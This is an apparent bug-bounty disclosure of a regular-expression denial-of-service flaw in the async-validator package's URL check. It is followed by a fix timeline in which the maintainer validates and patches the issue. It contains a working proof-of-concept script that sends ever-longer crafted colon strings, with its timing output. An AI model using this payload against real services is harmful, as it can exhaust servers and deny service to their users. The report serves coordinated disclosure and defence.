Inefficient Regular Expression Complexity in yiminghe/async-validator

Valid

Reported on

Sep 12th 2021


✍️ Description

It allows cause a denial of service when validating crafted invalid URLs.

🕵️‍♂️ Proof of Concept

// PoC.js
var asyncValidator = require("async-validator")

const validator =  new asyncValidator.default({
    v: {
        type: 'url',
      },
    })
 
 
 for(var i = 1; i <= 50000; i++) {
   var time = Date.now();
   var attack_str = '//' + ':'.repeat(i*10000) + '@';
   validator.validate({
        v: attack_str,
      });  
   var time_cost = Date.now() - time;
   console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
}

💥 The Output

attack_str.length: 10003: 203 ms
attack_str.length: 20003: 612 ms
attack_str.length: 30003: 1316 ms
attack_str.length: 40003: 2337 ms
attack_str.length: 50003: 3656 ms
attack_str.length: 60003: 5264 ms
attack_str.length: 70003: 7158 ms
attack_str.length: 80003: 9350 ms
attack_str.length: 90003: 11906 ms
attack_str.length: 100003: 14648 ms

Occurences

We created a GitHub Issue asking the maintainers to create a SECURITY.md 3 months ago
Yeting Li submitted a
3 months ago
We have contacted a member of the yiminghe/async-validator team and are waiting to hear back 2 months ago
yiminghe
2 months ago

Maintainer


https://github.com/yiminghe/async-validator/commit/0e9a1640aef674f6b6bdc177e8ea405724aa4fb4

yiminghe validated this vulnerability 2 months ago
Yeting Li has been awarded the disclosure bounty
The fix bounty is now up for grabs
yiminghe confirmed that a fix has been merged on 0e9a16 2 months ago
Yeting Li has been awarded the fix bounty
type.ts#L10 has been validated
Yeting Li
a month ago

Researcher


Hi @admin, can you assign a CVE?

Jamie Slome
a month ago

Admin


As mentioned in the other report, we no longer assign CVEs against this vulnerability type.